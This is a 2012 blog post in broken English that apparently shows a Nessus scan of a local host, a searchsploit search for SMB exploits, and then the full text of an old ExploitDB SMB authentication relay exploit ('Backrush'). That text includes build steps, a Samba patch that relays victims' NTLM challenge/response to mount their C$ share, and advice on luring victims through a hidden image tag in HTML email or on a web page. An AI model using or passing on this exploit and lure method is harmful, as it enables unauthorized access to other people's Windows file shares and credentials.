Jumat, 27 Januari 2012

How to access Exploit on ExploitDB



sentence in the brackets my take from WIKIPEDIA.

(the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw)
we will start :
there is two manner for scan all ip to look using NESSUS and nmap which i use is NESSUS.












above is picture scanning with NESSUS. port the lot open is IP 192.168.0.67 and double click ip the 192.168.0.67 results is :

pass double click smb results is :

and display result from informasion report  for port 139 or protocol tcp
 
and plugin report can see in here
then we do exploit  with open tools in backtrack with name exploitdb search that are exploitation tools affterwards click open source exploitation.
afterwards we write the command:

root@bt:/pentest/exploits/exploitdb# ./searchsploit smb
then appears

Description Path

--------------------------------------------------------------------------- -------------------------

MS Windows SMB Authentication Remote Exploit /windows/remote/20.txt

Linux pam_lib_smb < 1.1.6 /bin/login Remote Exploit /linux/remote/89.c

MS Windows (SMB) Transaction Response Handling Exploit (MS05-011) /windows/dos/1065.c

MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030) /windows/local/1911.c

Links 1.00pre12 (smbclient) Remote Code Execution Exploit /multiple/remote/2784.html

smbftpd 0.96 SMBDirList-function Remote Format String Exploit /linux/remote/4478.c

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit /osX/local/4759.c

Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC /multiple/dos/5712.pl

Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC /multiple/dos/5712.pl

MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta) /windows/dos/6463.rb

SmbRelay3 NTLM Replay Attack Tool/Exploit (MS08-068) /windows/remote/7125.txt

VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BOF PoC /windows/dos/9029.rb

VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit /windows/remote/9303.c

VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ) /windows/remote/9318.py

VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BOF PoC /windows/dos/9427.py

Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln /windows/dos/9594.txt

VLC Media Player 1.0.2 smb:// URI stack overflow PoC /windows/remote/9816.py

VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC /windows/dos/10333.py

Proof of Concept for MS10-006 SMB Client-Side Bug /windows/dos/12258.py

Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC /windows/dos/12273.py

Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC /windows/dos/12273.py

Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC /windows/dos/12273.py

Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC /windows/dos/12273.py

Windows SMB2 Negotiate Protocol (0x72) Response DOS /windows/dos/12524.py

Netware SMB Remote Stack Overflow PoC /novell/dos/13906.txt

Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) /windows/dos/14607.py

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) /windows/remote/14674.txt

smbind <= v.0.4.7 SQL Injection Vulnerability /php/webapps/14884.txt

VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC /windows/dos/14892.py

Microsoft Windows SMB Relay Code Execution /windows/remote/16360.rb

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference /windows/remote/16363.rb

Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) /windows/remote/16366.rb

VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow /windows/local/16678.rb

point for observe program waht existing in it and which will in use.

 furthermore we written order :

root@bt:/pentest/exploits/exploitdb# cat platforms/windows/remote/20.txt
##########################################

# Exploit for "Authentication flaw in Windows SMB protocol" #

##########################################

# Release Date:

# April 24, 2003

#

# Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)

# Salman Niksefat (salman@linux.ce.aut.ac.ir)

#

# Systems Affected by this exploit:

# Windows 2000 (SP0 SP1 SP2 SP3)

# Windows XP (SP0 SP1)

#

# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT

# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.

##########################################



This exploit is based on samba-2.2.8a, you can download the source code from:

http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2

or other mirrors.



First you should configure and make samba source code as follow:

You need first to extract the file:

$ tar -jxf samba-2.2.8a.tar.bz2

$ cd samba-2.2.8a/source



Here you need to configure with suitable options. Here is a config for RedHat 9:

$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\

--with-lockdir=/var/cache/samba --with-configdir=/etc/samba



$ make

$ make bin/smbmount

$ su

# make install



First add an arbitary user to samba: (Choose a reliable password for it for your protection!)

# smbadduser smbtmpuser:root



Now check if your samba server(bin/smbd) and client(bin/smbmount) are working,

and that ipchains rulls are not set. you can use:

# service smbd stop

# bin/smbd -i

# ipchains -F



Well, now if everything works fine, you can apply the exploit code to the source.

Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch

# patch < backrush.patch



Make it again:

# make bin/smbd

# make bin/smbmount

[Note that you shouldn't make whole samba, cause you may get linker errors]



Make necessary directories:

# mkdir -p bin/backrush/log

# mkdir bin/backrush/mnt

# touch bin/backrush/ip2sharename.map



Now we are done, you MUST change directory to bin and run the server:

# cd bin

# killall -9 smbd

# ./smbd



Now by default, the C$ share folder of any Windows machine who tries to connect

to this SMB server, would be mounted to mnt/machinename-random folder.

If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:

IPADDRESS:SHARENAME

This option is suitable for XP systems.



2 ways 2 force a client to automatically connect to your modified SMB server:

1. Send him/her a HTML email with the following tag:

<IMG src='\\smb-server\nofile.gif' width=1 height=1>



2. Invite him/her to visit your personal web page.

You can make it by the above tag, then pray and wait until he/she visits your page. ;)



Enjoy!





* backrush.patch *





diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c

--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430

+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430

@@ -26,6 +26,10 @@

#include <mntent.h>

#include <asm/types.h>

#include <linux/smb_fs.h>

+//>Backrush

+int br_read[2], br_write[2], br_pid;

+struct Backrush br_state;

+//<



extern BOOL in_client;

extern pstring user_socket_options;

@@ -177,6 +181,21 @@

cli_shutdown(c);

return NULL;

}

+//>Backrush

+ {

+ int i;

+ printf("challange: ");

+ for (i = 0; i < 8; i++)

+ printf("%0.2x",c->cryptkey[i]);

+ fflush(stdout);

+ memcpy(br_state.challenge, c->cryptkey, 8);

+ br_state.status = 1;

+ write(br_write[1],&br_state, sizeof(br_state));

+ printf(" sent to server\n");

+ printf("waiting for response...\n");

+ fflush(stdout);

+ }

+//<



if (!got_pass) {

char *pass = getpass("Password: ");

@@ -848,6 +867,14 @@

if (*credentials != 0) {

read_credentials_file(credentials);

}

+//>Backrush

+ printf("Started to mount %s on %s\n",argv[1], argv[2]);

+ fflush(stdout);

+ if (getenv("BACKRUSH_READ"))

+ br_read[0] = atoi(getenv("BACKRUSH_READ"));

+ if (getenv("BACKRUSH_WRITE"))

+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));

+//<



DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));



diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h

--- /root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000 +0330

+++ /backrush/source.exp/include/includes.h 2003-04-17 10:36:54.000000000 +0430

@@ -1,5 +1,26 @@

#ifndef _INCLUDES_H

#define _INCLUDES_H

+

+//>Backrush

+#include <stdlib.h>

+#include <time.h>

+struct Backrush

+{

+ int status;

+ char ip_address[20];

+ int port;

+ char username[256];

+ char sharename[256];

+ char netbios[256];

+ char domain[256];

+ char challenge[8];

+ char nt_resp[24];

+ char lm_resp[24];

+};

+extern struct Backrush br_state;

+extern int br_read[2],br_write[2],br_pid;

+//<

+

/*

Unix SMB/Netbios implementation.

Version 1.9.

diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c

--- /root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000 +0330

+++ /backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430

@@ -23,7 +23,6 @@



#include "includes.h"



-

static const struct {

int prot;

const char *name;

@@ -265,7 +264,28 @@

memcpy(pword, pass, passlen);

memcpy(ntpword, ntpass, ntpasslen);

}

-

+//>Backrush

+ {

+ int i;

+ read(br_read[0],&br_state, sizeof(br_state));

+ printf("received response:\n");

+ fflush(stdout);

+ memcpy(pword, br_state.lm_resp, 24);

+ memcpy(ntpword, br_state.nt_resp, 24);

+ if(br_state.username[0])

+ strncpy(user, br_state.username, 24);

+ printf("username: %s\n", user);

+ printf("lm response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",pword[i]);

+ printf("\n");

+ printf("nt response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",ntpword[i]);

+ printf("\n");

+ fflush(stdout);

+ }

+//<

/* send a session setup command */

memset(cli->outbuf,'\0',smb_size);



diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c

--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430

@@ -180,6 +180,45 @@

doencrypt = ((cli->sec_mode & 2) != 0);

}



+//>Backrush

+ {

+ srand(time(NULL));

+ pipe(br_read);

+ pipe(br_write);

+ br_state.status = 1;

+ br_state.port = random();

+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));

+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));

+ {

+ char tmp[1024], *ptr;

+ FILE *fin = fopen("backrush/ip2sharename.map","r");

+ if (fin)

+ {

+ while(fscanf(fin, "%s", tmp) > 0)

+ {

+ ptr = strchr(tmp, ':');

+ *ptr++ = 0;

+ if (!strcmp(br_state.ip_address,tmp))

+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));

+ }

+ fclose(fin);

+ }

+ }

+ if (!(br_pid = fork()))

+ {

+ char cmd[1024];

+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;

./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in

>backrush/log/%s-%d",

+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address,

br_state.port, br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d",

br_state.ip_address, br_state.port);

+ system(cmd);

+ _exit(0);

+ }

+ }

+//<

+

if (doencrypt) {

crypt_len = 8;

if (!cli) {

diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c

--- /root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/password.c 2003-04-19 09:15:47.000000000 +0430

@@ -48,6 +48,10 @@

unsigned char buf[8];



generate_random_buffer(buf,8,False);

+//>Backrush

+ read(br_read[0],&br_state, sizeof(br_state));

+ memcpy(buf, br_state.challenge, 8);

+//<



memcpy(saved_challenge, buf, 8);

memcpy(challenge,buf,8);

@@ -466,7 +470,13 @@

uchar challenge[8];

char* user_name;

uint8 *nt_pw, *lm_pw;

-

+//>Backrush

+ memcpy(br_state.nt_resp, nt_pass, 24);

+ memcpy(br_state.lm_resp, lm_pass, 24);

+ write(br_write[1],&br_state, sizeof(br_state));

+// waitpid(br_pid,NULL,WNOHANG);

+ return(False);

+//<

if (!lm_pass || !sampass)

return(False);



diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c

--- /root/samba-2.2.8a/source/smbd/reply.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/reply.c 2003-04-16 18:03:58.000000000 +0430

@@ -974,6 +974,11 @@

* security=domain.

*/



+//>Backrush

+ strncpy(br_state.username,user,sizeof(br_state.username));

+ strncpy(user,"root",sizeof(br_state.username));

+//<

+

if (!guest && !check_server_security(orig_user, domain, user,

smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&

!check_domain_security(orig_user, domain, user, smb_apasswd,

diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c

--- /root/samba-2.2.8a/source/smbd/server.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/server.c 2003-04-16 18:05:17.000000000 +0430

@@ -25,6 +25,11 @@

extern fstring global_myworkgroup;

extern pstring global_myname;



+//<Backrush

+int br_read[2],br_write[2],br_pid;

+struct Backrush br_state;

+//>

+

int am_parent = 1;



/* the last message the was processed */



# milw0rm.com [2003-04-25]

 point for script existing in it

Tidak ada komentar:

Posting Komentar